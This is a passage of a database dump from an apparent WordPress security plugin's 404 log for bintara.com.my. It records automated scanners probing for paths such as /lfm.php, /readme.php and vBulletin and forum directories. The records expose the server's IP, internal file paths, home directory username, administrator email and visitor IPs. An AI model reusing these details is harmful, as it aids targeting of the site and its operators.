:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:10:\"SCRIPT_URL\";s:8:\"/lfm.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZAJSnupQ8972QULTgy1oQAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569720650.5468\";s:12:\"REQUEST_TIME\";s:10:\"1569720650\";}}','notice','2019-09-29 01:30:52','2019-09-29 01:30:50',35178456,36976112,'https://bintara.com.my/lfm.php',1,0,'67.231.28.145'),(27600,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"460-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"460-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"460-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuN4MFLk21hQvqQVuzzgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuN4MFLk21hQvqQVuzzgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"25458\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuN4MFLk21hQvqQVuzzgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401847.3545\";s:12:\"REQUEST_TIME\";s:10:\"1570401847\";}}','notice','2019-10-06 22:44:09','2019-10-06 22:44:07',35049928,36859960,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27291,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/vbulletin5/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/vbulletin5/\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/vbulletin5/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-yeVkF2ixSfzlznd0VJgAAAUM\";s:12:\"REDIRECT_URL\";s:12:\"/vbulletin5/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"46578\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/vbulletin5/\";s:10:\"SCRIPT_URL\";s:12:\"/vbulletin5/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-yeVkF2ixSfzlznd0VJgAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569714809.236\";s:12:\"REQUEST_TIME\";s:10:\"1569714809\";}}','notice','2019-09-28 23:53:31','2019-09-28 23:53:29',35134288,36933160,'https://bintara.com.my/vbulletin5/',1,0,'45.93.20.4'),(27290,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/vb5/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/vb5/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/vb5/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-ycY@6RYMKETn@EuqDwQAAAZQ\";s:12:\"REDIRECT_URL\";s:5:\"/vb5/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"57932\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/vb5/\";s:10:\"SCRIPT_URL\";s:5:\"/vb5/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-ycY@6RYMKETn@EuqDwQAAAZQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569714802.0575\";s:12:\"REQUEST_TIME\";s:10:\"1569714802\";}}','notice','2019-09-28 23:53:24','2019-09-28 23:53:22',35131720,36929200,'https://bintara.com.my/vb5/',1,0,'45.93.20.4'),(27289,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/vbulletin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/vbulletin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/vbulletin/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-yb4@6RYMKETn@EuqDwAAAAYU\";s:12:\"REDIRECT_URL\";s:11:\"/vbulletin/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"57932\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/vbulletin/\";s:10:\"SCRIPT_URL\";s:11:\"/vbulletin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-yb4@6RYMKETn@EuqDwAAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569714799.565\";s:12:\"REQUEST_TIME\";s:10:\"1569714799\";}}','notice','2019-09-28 23:53:21','2019-09-28 23:53:19',35134448,36941680,'https://bintara.com.my/vbulletin/',1,0,'45.93.20.4'),(27288,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:4:\"/vb/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"https://bintara.com.my/vb/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/vb/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-yaP4iBtRFmmlvRDaYTAAAAdg\";s:12:\"REDIRECT_URL\";s:4:\"/vb/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"34340\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"https://bintara.com.my/vb/\";s:10:\"SCRIPT_URL\";s:4:\"/vb/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-yaP4iBtRFmmlvRDaYTAAAAdg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569714792.6777\";s:12:\"REQUEST_TIME\";s:10:\"1569714792\";}}','notice','2019-09-28 23:53:14','2019-09-28 23:53:13',35128496,36929336,'https://bintara.com.my/vb/',1,0,'45.93.20.4'),(27286,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/forum/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/forum/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/forum/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-yYf4iBtRFmmlvRDaYRQAAAcQ\";s:12:\"REDIRECT_URL\";s:7:\"/forum/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"39188\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/forum/\";s:10:\"SCRIPT_URL\";s:7:\"/forum/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-yYf4iBtRFmmlvRDaYRQAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569714785.7244\";s:12:\"REQUEST_TIME\";s:10:\"1569714785\";}}','notice','2019-09-28 23:53:08','2019-09-28 23:53:06',35131080,36934568,'https://bintara.com.my/forum/',1,0,'45.93.20.4'),(27287,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/forums/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/forums/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/forums/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY-yZv4iBtRFmmlvRDaYSgAAAc4\";s:12:\"REDIRECT_URL\";s:8:\"/forums/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"34340\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/forums/\";s:10:\"SCRIPT_URL\";s:8:\"/forums/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-yZv4iBtRFmmlvRDaYSgAAAc4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569714790.1792\";s:12:\"REQUEST_TIME\";s:10:\"1569714790\";}}','notice','2019-09-28 23:53:12','2019-09-28 23:53:10',35129632,36943672,'https://bintara.com.my/forums/',1,0,'45.93.20.4'),(27285,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.4 Safari/537.36 Chrome/66.0.3359.130\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.99.9.139\";s:11:\"REMOTE_PORT\";s:5:\"62890\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY-ejf4iBtRFmmlvRDaKbAAAAc8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569709709.5509\";s:12:\"REQUEST_TIME\";s:10:\"1569709709\";}}','notice','2019-09-28 22:28:33','2019-09-28 22:28:29',35529096,37324560,'https://bintara.com.my/?page_id=18',1,0,'139.99.9.139'),(27283,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.137\";s:11:\"REMOTE_PORT\";s:4:\"2456\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY@pjX73jAJRYLLyxSgnxAAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569696141.6963\";s:12:\"REQUEST_TIME\";s:10:\"1569696141\";}}','notice','2019-09-28 18:42:29','2019-09-28 